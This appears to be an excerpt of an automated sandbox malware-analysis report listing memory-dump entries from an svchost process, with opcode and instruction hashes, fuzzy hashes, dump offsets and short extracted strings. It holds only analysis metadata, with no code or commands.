                                                                    • Instruction ID: 0aa6defc5471bc2afffabb97f3e90749d2eb79f235a5fd359d4d7c290ab1f347
                                                                    • Opcode Fuzzy Hash: 6bf6c02d0c90fe304b88f5d58edc068345ef6bb8a2392cf3a75c519054c1d094
                                                                    • Instruction Fuzzy Hash: C8E138B47102028FCB54DF7DC998A6A77F6BF8961471584AAE906CB375EE70EC01CB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,jq$K+
                                                                    • API String ID: 0-517921994
                                                                    • Opcode ID: e2e3c9877532489cf0809c0881982d3f18ba88f90d4532f38473caa8c401e468
                                                                    • Instruction ID: cba29b4017d7972b1f85baadabfae0f0e0f76e414238b1b111fc0885cd93b0fb
                                                                    • Opcode Fuzzy Hash: e2e3c9877532489cf0809c0881982d3f18ba88f90d4532f38473caa8c401e468
                                                                    • Instruction Fuzzy Hash: EFA13FB1B102069FCB14DFA8C554A9EB7B3FF88704B10855AD9069B3A8DF70ED46CB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \VZl$\VZl
                                                                    • API String ID: 0-3226392100
                                                                    • Opcode ID: 1e4d4f91159b9139e167bed18a39b29e8df7801f7f0ffb57b375dc89bbaaf70c
                                                                    • Instruction ID: 0429e25d79d53546ec4159cb78b385ebf53f7a56e4c3ff0460bb3c9a02e5408f
                                                                    • Opcode Fuzzy Hash: 1e4d4f91159b9139e167bed18a39b29e8df7801f7f0ffb57b375dc89bbaaf70c
                                                                    • Instruction Fuzzy Hash: BF7127B0E002098FDB14CFA9C98579EFBF2EF88714F14812DE519AB354EB749885CB91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \VZl$\VZl
                                                                    • API String ID: 0-3226392100
                                                                    • Opcode ID: 9146db292330328c19e213302b81ca69514bde83db2d821cb00f57e2c93b9647
                                                                    • Instruction ID: f8ec6e0b2a82f8f881e301b43ba2dbc99bd1137265bc067fc63f1081cea08ba1
                                                                    • Opcode Fuzzy Hash: 9146db292330328c19e213302b81ca69514bde83db2d821cb00f57e2c93b9647
                                                                    • Instruction Fuzzy Hash: DB7116B1E00209CFDB14CFA9C98579EFBF2EF88314F148129E519AB354EB749985CB91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Hjq$dLlq
                                                                    • API String ID: 0-3820807802
                                                                    • Opcode ID: 01979f515660a3267ddd31d8e420a681e9e8750660e1c79bb2c4c1050bec9fef
                                                                    • Instruction ID: 2a2e8f1d2d26f9bafeebf5430f4cd9f5e52abf49e634768c112b2d65165d8cc7
                                                                    • Opcode Fuzzy Hash: 01979f515660a3267ddd31d8e420a681e9e8750660e1c79bb2c4c1050bec9fef
                                                                    • Instruction Fuzzy Hash: 7B51B271B042449FCB15DF78C458A9EBFF7AF89200F1444AEE605EB3A2CA759C45CB91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $fq$$fq
                                                                    • API String ID: 0-2537786760
                                                                    • Opcode ID: dd80eb181721aa7a9caad5afcbcf71904766e983e8bc90ab51b39b5428b59b02
                                                                    • Instruction ID: b17283d65e4aeabb20f8e5bbc6f9fc8b35001f9bd25045a3c6d6aa6bdbd0c7ac
                                                                    • Opcode Fuzzy Hash: dd80eb181721aa7a9caad5afcbcf71904766e983e8bc90ab51b39b5428b59b02
                                                                    • Instruction Fuzzy Hash: 77417A70604516CBCB19AF69940862AFB77BBC4719338899CF3069B399CB31DD16CB85
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Hbgq
                                                                    • API String ID: 0-956894282
                                                                    • Opcode ID: c8140831c69f6aa6f4d0c193ce89bc685b672b3c2f416673e9fe75812c3ed5e9
                                                                    • Instruction ID: bda5c4b9f7b669cf7599814afee53a85e0b28fe77a01b2ed79d27aff6ad6a080
                                                                    • Opcode Fuzzy Hash: c8140831c69f6aa6f4d0c193ce89bc685b672b3c2f416673e9fe75812c3ed5e9
                                                                    • Instruction Fuzzy Hash: 1B022BB5A00206DFCB15DFA8C48099EBBF2FF89310F15859AE8099B761DB30ED45CB91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $fq
                                                                    • API String ID: 0-12477121
                                                                    • Opcode ID: 6339b7f7b6a377857947be9d7a08d94e1af8407b0ba9f1167c9ffd7ebf0b190d
                                                                    • Instruction ID: 8de5070379d7e2acaeab4a1d78cef564192acb79489d783e791cca8ea20018ba
                                                                    • Opcode Fuzzy Hash: 6339b7f7b6a377857947be9d7a08d94e1af8407b0ba9f1167c9ffd7ebf0b190d
                                                                    • Instruction Fuzzy Hash: A8F12FB4B002069FCB14DFA9C494AAEB7F6BF89710B15856EE905EB354DB31EC41CB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \VZl
                                                                    • API String ID: 0-3439240617
                                                                    • Opcode ID: 2657ca856e56a6280eea59c25f2c10ca1ce287c153016cb12c168f697403b0f3
                                                                    • Instruction ID: 64608aa66011a06f57d5100d4299b4afc9260b1040f7522271ea4272838a91b1
                                                                    • Opcode Fuzzy Hash: 2657ca856e56a6280eea59c25f2c10ca1ce287c153016cb12c168f697403b0f3
                                                                    • Instruction Fuzzy Hash: 6CB12A70E00219CFDB10DFA9C9857AEFBF2AF88314F14812DEA15A7394EB749945CB91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'fq
                                                                    • API String ID: 0-2007657732
                                                                    • Opcode ID: 90c1ee4bbb98c6e24ffe095ef0998a95a926afb6659d8b0fbadff16e0949918b
                                                                    • Instruction ID: 05926776452008154aea2495aecf11c1e5eb74750f441ce16c7accabbc9cf263
                                                                    • Opcode Fuzzy Hash: 90c1ee4bbb98c6e24ffe095ef0998a95a926afb6659d8b0fbadff16e0949918b
                                                                    • Instruction Fuzzy Hash: E391A0B07002069FC715DAA9C8616EA7BEAFFC9300F54886EE905CB255DF31DC42C7A1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2938537097.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_76c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Dmq
                                                                    • API String ID: 0-4031372824
                                                                    • Opcode ID: aab6332ace9a24b4316db7e71b96db894afb645d1833cf6e13ac9f2e9bf9ae62
                                                                    • Instruction ID: e091d3dd2efc2a503df6890e979bd7c818007f23f73896dca444450582013f33
                                                                    • Opcode Fuzzy Hash: aab6332ace9a24b4316db7e71b96db894afb645d1833cf6e13ac9f2e9bf9ae62
                                                                    • Instruction Fuzzy Hash: 7381BDB4B002049FC718EF69E494A6ABBE6FF88310F14846DD50A9B3A5DF34EC41CB94
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2939551408.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_8170000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Dmq
                                                                    • API String ID: 0-4031372824
                                                                    • Opcode ID: 4da363e79b1f127ff1cec9d604fa658dc8ab667f33f7136fe23c2ee44b5fca35
                                                                    • Instruction ID: cad5fb543e3ab434026f373a0ffd4ea13c9d5bde5f7c18bac74c7223b2a1656a
                                                                    • Opcode Fuzzy Hash: 4da363e79b1f127ff1cec9d604fa658dc8ab667f33f7136fe23c2ee44b5fca35
                                                                    • Instruction Fuzzy Hash: 19818E74B002049FC758EF68E494A6ABBF2FF89310F148569D8059B3A1DF34AC46CFA0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Hjq
                                                                    • API String ID: 0-3368716452
                                                                    • Opcode ID: db1d05a0e2bef24348db03e7c6abe2405b83f671fd9c4c69463acb8b66222f7b
                                                                    • Instruction ID: 02315401dd966fef986982cce28746e5b375a6aa76b58dccfbb6e0498a3f3d96
                                                                    • Opcode Fuzzy Hash: db1d05a0e2bef24348db03e7c6abe2405b83f671fd9c4c69463acb8b66222f7b
                                                                    • Instruction Fuzzy Hash: F971A2B1B002459FCB05DFA8D8549AEBBB6FFC9210B14845AE505DB362CB35ED05CBA1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: xjq
                                                                    • API String ID: 0-3434123017
                                                                    • Opcode ID: 9bfcab43fecc198838323f974f41a06b4482733edff97d4514ae3e3552fc7db9
                                                                    • Instruction ID: 1cb65f11150ef364125f558784f61c4ac2b0ddebac4d3b3eb64ee50f83f38243
                                                                    • Opcode Fuzzy Hash: 9bfcab43fecc198838323f974f41a06b4482733edff97d4514ae3e3552fc7db9
                                                                    • Instruction Fuzzy Hash: F9915B74A00301CFD726CF1CE548716BBB1F785324F20952DCB1687BA8DB769A85CB92
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'fq
                                                                    • API String ID: 0-2007657732
                                                                    • Opcode ID: 01526222313c455244dbb8dc768e1cd5896f8da7dfe857cbe88ea58a459154a8
                                                                    • Instruction ID: dc10691fd739b04da7732a8174d5825c0be0aa157a8bae6d8df5a7c92839f2e7
                                                                    • Opcode Fuzzy Hash: 01526222313c455244dbb8dc768e1cd5896f8da7dfe857cbe88ea58a459154a8
                                                                    • Instruction Fuzzy Hash: 7981FAB4B007468FCB24DFA5D4947AEBBF6BF84350F24852DD816DB294DB34A841CB40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: K+
                                                                    • API String ID: 0-1526790930
                                                                    • Opcode ID: 0087d48ecd393edc16dada82fd9b2761ee0cab7d38f9ec78d33ecc2f9cd73886
                                                                    • Instruction ID: 19a3cc58659fea2bf59ac19533fcc5ba91c10e56b65a72d673c173726b52b92e
                                                                    • Opcode Fuzzy Hash: 0087d48ecd393edc16dada82fd9b2761ee0cab7d38f9ec78d33ecc2f9cd73886
                                                                    • Instruction Fuzzy Hash: 2E714DB1A0060A9FC718DFA8C594ADEB7F2FF85710B10855AE905AB3A4DF70ED45CB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2938537097.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_76c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ;&Vk^
                                                                    • API String ID: 0-2130195118
                                                                    • Opcode ID: cb9d8676c065fdb695bd953c60fb3a728be10192ffac1dd22e01676642d23acf
                                                                    • Instruction ID: 70e8a65615be82fa21f1caacba849bd820cee55aa109f012459ea05fa05a2923
                                                                    • Opcode Fuzzy Hash: cb9d8676c065fdb695bd953c60fb3a728be10192ffac1dd22e01676642d23acf
                                                                    • Instruction Fuzzy Hash: D1615B75B002458FCB14DB78D468AAEBBF2EF89215F10806DE406DB365DF319C81CB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $fq
                                                                    • API String ID: 0-12477121
                                                                    • Opcode ID: b81c5dc1acfc1ceb29f87d7a24968569c5e595be6ec1c9858e5ed97bd1588b4f
                                                                    • Instruction ID: 7e836d899873eea65746a877c2801082b3d66d042daa0b6e1e112bf5fb673cab
                                                                    • Opcode Fuzzy Hash: b81c5dc1acfc1ceb29f87d7a24968569c5e595be6ec1c9858e5ed97bd1588b4f
                                                                    • Instruction Fuzzy Hash: 8D614D76A00205DFD714DFA9D558AEDB7B6FB88321F10806AE806E7290DB359C45CBA0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'fq
                                                                    • API String ID: 0-2007657732
                                                                    • Opcode ID: ec6e74898a2f8ccca36146741f9ab677099d74079d324f16364027d4b80607c7
                                                                    • Instruction ID: 2dc2a459a6403e80ad5e92499afbed0a3120706da11a753ed0db4f17d453ca7f
                                                                    • Opcode Fuzzy Hash: ec6e74898a2f8ccca36146741f9ab677099d74079d324f16364027d4b80607c7
                                                                    • Instruction Fuzzy Hash: 49619EB1A003529FC709DF68D4908DABBF1FF89314B14899AD0598B362DB30ED85CBE1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: a885daf5d99ac13e883c754359a8f455c410d8a34a36e90cf7880d0a7b57080e
                                                                    • Instruction ID: 6f4056a21d569d5ec3e3ab5f8f48eb5e57a906f24a7d4af631542bbae3d7c591
                                                                    • Opcode Fuzzy Hash: a885daf5d99ac13e883c754359a8f455c410d8a34a36e90cf7880d0a7b57080e
                                                                    • Instruction Fuzzy Hash: 42515DB1A002199FDB15CFA9C885AEEBBF2FF88210F14C46AE815AB251D735DD44DB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2938537097.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_76c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Dmq
                                                                    • API String ID: 0-4031372824
                                                                    • Opcode ID: e71d12836316bcd07077afaba83f37fe5aad7d1491cadc0a71eac5e0b930343e
                                                                    • Instruction ID: e4bbcd4e33621a94536a0266d41366885e2f76e93bd371012d3738bb611a1c7c
                                                                    • Opcode Fuzzy Hash: e71d12836316bcd07077afaba83f37fe5aad7d1491cadc0a71eac5e0b930343e
                                                                    • Instruction Fuzzy Hash: 7B518DB4B006019FC714DF2DE484969BBF2FF88310B5581ADD816AB7A1DB34EC41CB94
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tefq
                                                                    • API String ID: 0-1066582953
                                                                    • Opcode ID: 85c4876042f764bfb7731a6a172b286970e6e1cfa900c16d3daa242bcf5bbd0b
                                                                    • Instruction ID: c2e81fb709b955aafb19d62a4f4903a736258aa81f1e936e79ecb737650ec4eb
                                                                    • Opcode Fuzzy Hash: 85c4876042f764bfb7731a6a172b286970e6e1cfa900c16d3daa242bcf5bbd0b
                                                                    • Instruction Fuzzy Hash: 59516A70B40204DFE714DB69D959BAABBF2FF48724F208159EA169B3E1CB75AC41CB40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LRfq
                                                                    • API String ID: 0-2333822924
                                                                    • Opcode ID: 31985adc1c34e89d5bfffb6c4af9046c00d0eab2bf30994e1d6650da8a3ad52e
                                                                    • Instruction ID: 88957c0ed9eea1122ede2cd633ccd7df3baa98a4390f5048709d51ea4f367e7f
                                                                    • Opcode Fuzzy Hash: 31985adc1c34e89d5bfffb6c4af9046c00d0eab2bf30994e1d6650da8a3ad52e
                                                                    • Instruction Fuzzy Hash: 0141FF34F002168FCB199BBC955496FBBF6EF8A210F50456DE61ADB3A9DE308C018791
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $fq
                                                                    • API String ID: 0-12477121
                                                                    • Opcode ID: f5f44e881f3f48333b0de5c65a6a46da3b73aa3eeeda54fffb36dec41ce18718
                                                                    • Instruction ID: 0a5b7e216953f115c53d4b3fc9e51eb527fee044d9f5aa3d803bffacf9b9d76d
                                                                    • Opcode Fuzzy Hash: f5f44e881f3f48333b0de5c65a6a46da3b73aa3eeeda54fffb36dec41ce18718
                                                                    • Instruction Fuzzy Hash: E941BB70208656DBCB1A9F69940822BFB36BFC0719339859DF3069B396CB31DD16CB85
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ^p
                                                                    • API String ID: 0-2464009452
                                                                    • Opcode ID: 1535f6b6142d1072e641c77837e250ba83b6e0170e297f49172285367fe70be8
                                                                    • Instruction ID: ee280942f2586c7e5fb3722877147fdb5488ca73ec8144dd5d5d783c6014606e
                                                                    • Opcode Fuzzy Hash: 1535f6b6142d1072e641c77837e250ba83b6e0170e297f49172285367fe70be8
                                                                    • Instruction Fuzzy Hash: 5141F979B002158FCB18DBA4D994AAEB7F7BFC8610F244469D806D73A4DF35AC06CB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: U
                                                                    • API String ID: 0-3372436214
                                                                    • Opcode ID: b385a10132032dc05e83aaa5ab06f552c3504f05a3548857904ed5d03175929d
                                                                    • Instruction ID: a74e60260348dedfa90d4f9e107f868913f12af97a57581a86c9f20b28a5ae74
                                                                    • Opcode Fuzzy Hash: b385a10132032dc05e83aaa5ab06f552c3504f05a3548857904ed5d03175929d
                                                                    • Instruction Fuzzy Hash: 9E415AB57002159FCB15DF78D4889AA7BF2FF8A211B048469E905CB355DB35EE01CBA0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: dLlq
                                                                    • API String ID: 0-46837485
                                                                    • Opcode ID: d8b85ba75c4584f46b8a6b81f28756eb3f85b0615185d17b58522fe18cd846e1
                                                                    • Instruction ID: ac32caac5c9545f36d181ad0086f5c29d5b6d955cb10a126ac40b63cab359fcf
                                                                    • Opcode Fuzzy Hash: d8b85ba75c4584f46b8a6b81f28756eb3f85b0615185d17b58522fe18cd846e1
                                                                    • Instruction Fuzzy Hash: DA317075A002048FDB14DF69C448B9EBBF6FF48204F14856DE501AB3A1CB74ED44CB91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: a7c37bfac2c930d1d7196ab0f664587d6cc0fffc95f30887496d2190ad82e8d9
                                                                    • Instruction ID: 46e55bab48f190e740d2ff23208529e604e9c3751c371ba53b68a2b569930c6d
                                                                    • Opcode Fuzzy Hash: a7c37bfac2c930d1d7196ab0f664587d6cc0fffc95f30887496d2190ad82e8d9
                                                                    • Instruction Fuzzy Hash: 1A21B172A002199FDB15CFA9C884AEF7BF9FF89220B04846AE504D7211E735DE44DB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'fq
                                                                    • API String ID: 0-2007657732
                                                                    • Opcode ID: ded0a2250f393d85ba051d497dc1b6622d9c5bd0c55dbfa917f5a170815c9437
                                                                    • Instruction ID: 7ea08ca04a43dd6cdaef28be2857aa629b3c5267363e588fba89f268cf1baf47
                                                                    • Opcode Fuzzy Hash: ded0a2250f393d85ba051d497dc1b6622d9c5bd0c55dbfa917f5a170815c9437
                                                                    • Instruction Fuzzy Hash: 80315CB560020ACFC714DFA8D485AAA7BF6FF89310B25446DE806DB361C731ED40CB60
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tefq
                                                                    • API String ID: 0-1066582953
                                                                    • Opcode ID: f908680bf2158e30bb6b8369a63536400d4876195bf68c4b202cbe69152d6cb4
                                                                    • Instruction ID: b08c1aab382b682e68339ad3a66f479c8b840514085e27d6fa7f5178f372e1af
                                                                    • Opcode Fuzzy Hash: f908680bf2158e30bb6b8369a63536400d4876195bf68c4b202cbe69152d6cb4
                                                                    • Instruction Fuzzy Hash: 35219071B001058FD7049B7AC454BAFFAF7AF8C610F28445AE606EB3A5CEB09C01CB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tefq
                                                                    • API String ID: 0-1066582953
                                                                    • Opcode ID: 2a5c20db8f99f1149635dc5c3ea43b98352c01ab00a6ebb86480327cc0a96fcd
                                                                    • Instruction ID: 2478aed6c650f0b7f8ceae32d41d7b7d650e974fa9a64c55126b6a034a536c60
                                                                    • Opcode Fuzzy Hash: 2a5c20db8f99f1149635dc5c3ea43b98352c01ab00a6ebb86480327cc0a96fcd
                                                                    • Instruction Fuzzy Hash: 99216A347101158FDB14DB68C418B6ABBF6AF88714F25409EE606DB3A1CA709C04CB91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tefq
                                                                    • API String ID: 0-1066582953
                                                                    • Opcode ID: 24bdc7d986ef97d1a9b386615a166aea492db4947bda0a87a9032923f0564a20
                                                                    • Instruction ID: c73472212127bdfd9ce4597909289097f46ced153a33363c8892cc9d082799e9
                                                                    • Opcode Fuzzy Hash: 24bdc7d986ef97d1a9b386615a166aea492db4947bda0a87a9032923f0564a20
                                                                    • Instruction Fuzzy Hash: 3B215B347101158FDB14DB69D418B6EBBF6AF88724F25815AF602DB3A1CF709C018B91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tefq
                                                                    • API String ID: 0-1066582953
                                                                    • Opcode ID: a2f11b3093eeb3242511b4a9d0a4056b8a6025b4ccb865279df49502d147e93a
                                                                    • Instruction ID: 7a3f9bc07c21f223be43f740767111e89d33cff4edd6dee45146490d2284daea
                                                                    • Opcode Fuzzy Hash: a2f11b3093eeb3242511b4a9d0a4056b8a6025b4ccb865279df49502d147e93a
                                                                    • Instruction Fuzzy Hash: DF115E70B001158FE7149B6EC455B6FFAE7AF88710F24846EE606EB3A4CEB09C01CB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: |
                                                                    • API String ID: 0-2343686810
                                                                    • Opcode ID: e1f35c18b8245deb8cef985a4ac8cbc967729b52299daa59b24d8854394ef5c8
                                                                    • Instruction ID: 3c9bbd783aafc4a112b6d6f892144131fc35f3c3a91fade9e0187c150fa74149
                                                                    • Opcode Fuzzy Hash: e1f35c18b8245deb8cef985a4ac8cbc967729b52299daa59b24d8854394ef5c8
